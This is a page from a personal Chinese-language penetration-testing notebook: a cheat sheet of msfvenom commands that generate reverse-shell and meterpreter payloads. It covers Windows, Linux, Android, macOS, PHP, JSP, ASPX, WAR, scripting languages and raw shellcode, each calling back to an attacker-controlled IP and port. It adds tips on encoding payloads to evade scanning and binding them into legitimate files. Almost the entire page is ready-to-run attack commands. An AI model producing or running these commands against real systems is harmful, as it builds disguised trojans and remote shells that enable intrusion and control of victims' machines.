wang kun' book
  • 目录
  • 环境配置
    • 2019年
      • Cobalt Strike kail的安装
      • vps配置ngrok反向代理
  • CTF WEB
    • 2019年
      • Spring boot SSTI
      • XML中XXE漏洞
        • XML和XXE基础
  • CTF Misc
    • 记一次PNG中的隐写
  • 渗透工具
    • Netcat
    • Metasploit
      • Untitled
      • Msfvenom常用payload
    • CobaltStrike生成windows木马
    • vps部署自动化src挖掘
    • SET社会工程工具包
  • 漏洞复现
    • CVE-2019-0708获取shell
  • hexo github搭建博客
    • 一. Hexo搭建个人博客
    • 二.Hexo添加主题
    • Hexo下的站点配置文件
    • 自定义主题
Powered by GitBook
On this page
  • windows
  • linux
  • android
  • powershell
  • mac
  • php
  • aspx
  • jsp
  • war
  • python
  • nodejs
  • perl
  • ruby
  • lua
  • windows shellcode
  • linux shellcode
  • show options

Was this helpful?

  1. 渗透工具
  2. Metasploit

Msfvenom常用payload

payload又称为攻击载荷,主要是用来建立目标机与攻击机稳定连接的,可返回shell,也可以进行程序注入等。也有人把payloads称 为shellcode。

windows

msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp
LHOST=攻击机IP LPORT=攻击机端口 -e x86/shikata_ga_nai -b '\x00\x0a\xff' -i 3 -f exe -o payload.exe

linux

msfvenom -a x86 --platform Linux -p linux/x86/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f elf -o payload.elf

android

捆绑文件Android需要先:

sudo apt install zipalign

//需要签名
msfvenom -a x86 --platform Android -p android/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f apk -o payload.apk

生成的安卓MainActivity一段时间会失效,需要show advanced,set exit on session 为false 和session communication timeout =0 默认会话是300秒断开

powershell

msfvenom -a x86 --platform Windows -p windows/powershell_reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -e cmd/powershell_base64 -i 3 -f raw -o payload.ps1

mac

msfvenom -a x86 --platform osx -p osx/x86/shell_reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f macho -o payload.macho

php

msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php
cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php

aspx

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f aspx -o payload.aspx

jsp

msfvenom --platform java -p java/jsp_shell_reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f raw -o payload.jsp

war

msfvenom -p java/jsp_shell_reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f raw - o payload.war

python

msfvenom -p python/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f raw -o payload.py

nodejs

msfvenom -p nodejs/shell_reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f raw -o payload.js

perl

msfvenom -p cmd/unix/reverse_perl LHOST=攻击机IP LPORT=攻击机端口 -f raw -o payload.pl

ruby

msfvenom -p ruby/shell_reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f raw -o payload.rb

lua

msfvenom -p cmd/unix/reverse_lua LHOST=攻击机IP LPORT=攻击机端口 -f raw -o payload.lua

windows shellcode

msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f c

linux shellcode

msfvenom -a x86 --platform Linux -p linux/x86/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f c

show options

  1. -l:列出所有的payload

  2. -p:指定要加载的payload

  3. -f:指定生成的格式输出:

  4. 可以生成一句话木马 asp,aspx,php等等

  5. 可以支持 py,java,c,bash,python等等

  6. 可以支持 exe,dll,elf,vbs,war等等

  7. -e:使用编码器,选择加壳encode

  8. -a:精确编码 生成的payload用于32位操作系统,指定-a x86

  9. -s:生成payload的时候可以指定最大多少

  10. -b:去除空代码或者错误代码减少多余的字符同时减少体积

  11. (-b \x00\xff)

  12. -i:指定编码次数(不好用,过不去网页查杀)

  13. -x:捆绑一个正常文件

  14. -o:指定输出位置

PreviousUntitledNextCobaltStrike生成windows木马

Last updated 5 years ago

Was this helpful?